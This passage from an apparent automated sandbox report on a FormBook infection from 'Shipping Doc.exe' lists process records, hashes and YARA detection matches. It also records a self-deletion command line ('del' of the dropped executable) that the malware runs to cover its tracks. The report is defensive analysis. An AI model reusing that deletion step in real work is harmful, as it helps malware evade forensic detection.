                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:20:40:37
                                      Start date:03/08/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff714890000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:20:41:03
                                      Start date:03/08/2021
                                      Path:C:\Windows\SysWOW64\cscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                      Imagebase:0xde0000
                                      File size:143360 bytes
                                      MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      General

                                      Start time:20:41:06
                                      Start date:03/08/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\Shipping Doc.exe'
                                      Imagebase:0xbd0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:20:41:06
                                      Start date:03/08/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis